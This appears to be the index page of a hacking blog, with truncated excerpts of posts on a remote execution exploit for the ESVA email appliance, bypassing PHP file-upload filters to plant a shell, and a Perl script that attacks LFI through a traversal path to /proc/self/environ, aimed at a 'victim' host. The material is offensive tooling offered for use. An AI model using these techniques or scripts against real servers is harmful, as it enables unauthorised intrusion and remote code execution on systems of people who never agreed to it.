ijoo

E-Mail Security Virtual Appliance (ESVA) Exploit.

# Exploit Title: E-Mail Security Virtual Appliance (ESVA) Remote Execution.
# Date: 10 Aug 2012
# Exploit Author: iJoo
# Vendor Homepage: http://www.esvacommunity.com/
# Software Link: http://sourceforge.net/projects/esva-project/
# Version: < 2.0.6

ESVA (E-Mail Security Virtual Appliance) is a pre-built and semi-configured email scanning appliance that will run on VMware Workstation, …

Bypass PHP Arbitrary File Upload

OK everyone, I will now continue the discussion of PHP Arbitrary File Upload, which was previously covered at: http://www.binushacker.net/php-arbitrary-file-upload-simple-patching.html The patch there is not very good, because the file type can be manipulated: not by renaming shell.jpg.php, but by manipulating the file's "header". The way to bypass it is as follows. Review the code first. If we try …

PHP Arbitrary File Upload Simple Patching

I will discuss a simple way to patch PHP Arbitrary File Upload. Most websites with a vulnerable upload follow this general outline. A simple example of an upload.php file-upload handler: An example of the form used in the index file for the upload: Here there is no code that filters the uploaded file type, so we can directly …

LFI Remote Execute in PERL

The following script runs/executes an LFI via /proc/self/environ in a simple way from the shell.

#!/usr/bin/perl
use LWP;
use HTTP::Request;

if (@ARGV < 1) {
    print "\n==========================================\n";
    print "          LFI Command Execution           \n";
    print "==========================================\n";
    print "Usage: perl LFI.pl (without http://)\n";
    print "Ex.    perl LFI.pl www.korban.com/index.php?page=\n";
    exit;
}

$host = $ARGV[0];
$lfi  = "..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron";
print "Try …
